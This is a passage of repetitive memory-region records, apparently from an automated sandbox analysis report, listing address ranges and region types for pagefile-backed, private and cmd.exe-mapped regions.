entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12795 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 12796 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12797 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12798 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12799 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12800 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12801 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12802 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12803 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12804 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12805 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12806 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13116 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 13117 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13118 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13119 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13120 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13121 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13122 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13123 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13124 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13125 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13126 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13127 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13553 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 13554 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13555 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13556 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13557 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13558 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13559 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13560 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13561 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13562 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13563 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13564 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14447 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 14448 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14449 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14450 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14451 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14452 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14453 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14454 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14455 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14456 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14457 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14458 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16609 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 16610 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16611 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16612 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16613 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16614 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16615 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16616 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16617 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16618 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16619 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16620 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17126 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 17127 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17128 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17129 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17130 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17131 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17132 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17133 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17134 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17135 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17136 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17137 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17663 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 17664 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17665 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17666 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17667 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17668 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17669 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17670 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17671 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17672 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17673 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17674 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18052 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 18053 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18054 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18055 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18056 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18057 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18058 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18059 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18060 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18061 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18062 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18063 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18542 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 18543 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18544 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18545 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18546 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18547 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18548 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18549 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18550 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18551 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18552 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18553 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19536 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 19537 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19538 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19539 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19540 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19541 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19542 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19543 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19544 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19545 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19546 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19547 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20060 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20061 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20062 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20063 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20064 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20065 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20066 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20067 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20068 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20069 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20070 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20071 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20531 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20532 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20533 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20534 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20535 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20536 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20537 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20538 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20539 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20540 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20541 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20542 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20873 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 20874 start_va = 0x7ff10000 end_va = 0x7ff5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff10000" filename = "" Region: id = 20951 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 20958 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 20959 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 22611 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 22612 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22613 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22614 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22615 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22616 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22617 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22618 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22619 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22620 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22621 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22622 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22744 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 22745 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 22758 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 23838 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 23839 start_va = 0x2180000 end_va = 0x258ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 23840 start_va = 0x2590000 end_va = 0x299ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 23841 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23842 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23843 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23844 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23845 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23846 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23847 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23848 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23849 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23850 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23851 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23852 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23853 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23854 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23855 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23856 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23857 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23858 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23859 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23860 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23861 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23862 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23863 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23864 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23865 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23866 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23877 start_va = 0x19d0000 end_va = 0x19e5fff 